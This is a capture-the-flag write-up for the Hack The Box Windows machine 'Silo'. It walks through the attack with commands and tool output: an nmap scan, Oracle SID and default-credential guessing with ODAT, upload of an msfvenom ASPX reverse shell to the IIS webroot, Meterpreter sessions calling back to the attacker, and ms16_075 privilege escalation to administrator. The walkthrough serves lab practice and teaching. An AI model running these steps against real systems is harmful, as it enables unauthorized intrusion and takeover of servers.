Silo

OS: Windows, Difficulty: Medium, IP: 10.10.10.82

Initial Enumeration

# Nmap 7.70 scan initiated Sun Jul 21 16:43:41 2019 as: nmap -sV -sC -O -A -p 80,135,139,445,1521,5985,47001 -oN O-detailed 10.10.10.82
Nmap scan report for 10.10.10.82
Host is up (0.28s latency).

PORT      STATE SERVICE      VERSION
80/tcp    open  http         Microsoft IIS httpd 8.5
| http-methods:
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/8.5
|_http-title: IIS Windows Server
135/tcp   open  msrpc        Microsoft Windows RPC
139/tcp   open  netbios-ssn  Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
1521/tcp  open  oracle-tns   Oracle TNS listener 11.2.0.2.0 (unauthorized)
5985/tcp  open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
47001/tcp open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Microsoft Windows Server 2012 (96%), Microsoft Windows Server 2012 R2 (94%), Microsoft Windows Server 2008 SP2 (93%), Microsoft Windows 7, Windows Server 2012, or Windows 8.1 Update 1 (93%), Microsoft Windows Server 2008 SP1 (93%), Microsoft Windows Vista SP1 (93%), Microsoft Windows 7 Professional SP1 (93%), Microsoft Windows 7 (92%), Microsoft Windows Server 2012 or Server 2012 R2 (92%), Microsoft Windows Server 2012 R2 Update 1 (92%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: -6m45s, deviation: 0s, median: -6m45s
| smb-security-mode:
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: supported
| smb2-security-mode:
|   2.02:
|_    Message signing enabled but not required
| smb2-time:
|   date: 2019-07-21 16:37:20
|_  start_date: 2019-07-21 16:20:43

TRACEROUTE (using port 443/tcp)
HOP RTT       ADDRESS
1   231.02 ms 10.10.14.1
2   265.03 ms 10.10.10.82

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sun Jul 21 16:44:11 2019 -- 1 IP address (1 host up) scanned in 30.90 seconds

So there are 3 web-servers, 3 SMB ports, and 1 Oracle Port. ran gobuster on all the web-servers but found nothing, dropped that vector. SMB ports, guest account was disabled and had no other credentials so dropped that too. Only port left was the Oracle Port. I found CVE-2012-1675, and it's exploit but I was not able to exploit it, either the server was not vulnerable or I had something mis-configured, so path beyond this was manual. However I found a Oracle Pentesting Kit on Github which was useful throughout the complete operation.

Find all the valid databases (SID) on this database.

./odat.py sidguesser -s 10.10.10.82 -p 1521

Found XE and few other to be valid SID, however, I chose to focus on XE.

Check if any default credentials are working on this database on the server.

./odat.py passwordguesser -s 10.10.10.82 -p 1521 -d XE --accounts-file accounts/accounts_lower.txt

NOTE: I checked both, UPPERCASE and LOWERCASE variations as 11G stores case sensitive passwords by default. Found scott:tiger to be a set of valid credentials.

Next task was to check if this account is SYSDBA or SYSOPER on this database on the server. I used docker to run sqlplus and check this.

docker run -e URL="scott/tiget@//10.10.10.82:1521/XE as sysdba" -ti sflyr/sqlplus
docker run -e URL="scott/tiget@//10.10.10.82:1521/XE as sysoper" -ti sflyr/sqlplus

It turns out that the user we had was a SYSDBA. One of the module of ODAT let's us put file on the server in a directory of our choosing, as we have web-servers running, we can be sure that there is a directory C:\Inetpub\wwwroot in the system, hence I chose to upload my ASPX MSFVENOM shell there and get a reverse shell.

./odat.py utlfile -s 10.10.10.82 -p 1521 -d XE -U scott -P tiger --putFile 'C:\inetpub\wwwroot' shell.aspx ../shell.aspx --sysdba
[*] Started reverse TCP handler on 10.10.14.8:9999
msf5 exploit(multi/handler) > [*] Sending stage (206403 bytes) to 10.10.10.82
[*] Meterpreter session 1 opened (10.10.14.8:9999 -> 10.10.10.82:49166) at 2019-07-21 23:03:02 +0530

msf5 exploit(multi/handler) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > sysinfo
Computer        : SILO
OS              : Windows 2012 R2 (Build 9600).
Architecture    : x64
System Language : en_GB
Domain          : HTB
Logged On Users : 0
Meterpreter     : x64/windows

User Own

c:\Users\Phineas\Desktop>type user.txt
type user.txt
92ede***

Root Own

msf5 exploit(multi/handler) > search local_exploit_suggester

Matching Modules
================

   #  Name                                      Disclosure Date  Rank    Check  Description
   -  ----                                      ---------------  ----    -----  -----------
   0  post/multi/recon/local_exploit_suggester                   normal  No     Multi Recon Local Exploit Suggester


msf5 exploit(multi/handler) > use post/multi/recon/local_exploit_suggester
msf5 post(multi/recon/local_exploit_suggester) > set SESSION 1
SESSION => 1
msf5 post(multi/recon/local_exploit_suggester) > show options

Module options (post/multi/recon/local_exploit_suggester):

   Name             Current Setting  Required  Description
   ----             ---------------  --------  -----------
   SESSION          1                yes       The session to run this module on
   SHOWDESCRIPTION  false            yes       Displays a detailed description for the available exploits

msf5 post(multi/recon/local_exploit_suggester) > run

[*] 10.10.10.82 - Collecting local exploits for x64/windows...
[*] 10.10.10.82 - 11 exploit checks are being tried...
[+] 10.10.10.82 - exploit/windows/local/ms16_075_reflection: The target appears to be vulnerable.
[+] 10.10.10.82 - exploit/windows/local/ms16_075_reflection_juicy: The target appears to be vulnerable.
[*] Post module execution completed
msf5 post(multi/recon/local_exploit_suggester) > use exploit/windows/local/ms16_075_reflection_juicy
msf5 exploit(windows/local/ms16_075_reflection_juicy) > run

[*] Started reverse TCP handler on 10.10.14.8:4444
[*] Launching notepad to host the exploit...
[+] Process 832 launched.
[*] Reflectively injecting the exploit DLL into 832...
[*] Injecting exploit into 832...
[*] Exploit injected. Injecting exploit configuration into 832...
[*] Configuration injected. Executing exploit...
[+] Exploit finished, wait for (hopefully privileged) payload execution to complete.
[*] Sending stage (179779 bytes) to 10.10.10.82
[*] Meterpreter session 3 opened (10.10.14.8:4444 -> 10.10.10.82:49186) at 2019-07-21 23:08:45 +0530
C:\Users\Administrator\Desktop>type root.txt
type root.txt
cd39e***

Learning Outcome

Setting up MSF for Oracle Pentest sucks, ODAT was a real life saver. Oracle pen-test is real fun.

PreviousBastardNextJeeves

Last updated